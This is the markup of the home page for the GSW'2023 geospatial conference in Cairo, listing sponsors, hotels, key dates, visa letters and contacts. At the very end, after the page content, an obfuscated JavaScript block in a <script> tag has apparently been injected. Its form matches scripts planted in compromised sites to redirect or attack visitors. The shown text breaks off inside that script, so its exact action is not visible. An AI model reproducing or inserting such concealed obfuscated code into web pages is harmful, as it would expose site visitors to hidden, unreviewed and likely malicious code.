width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 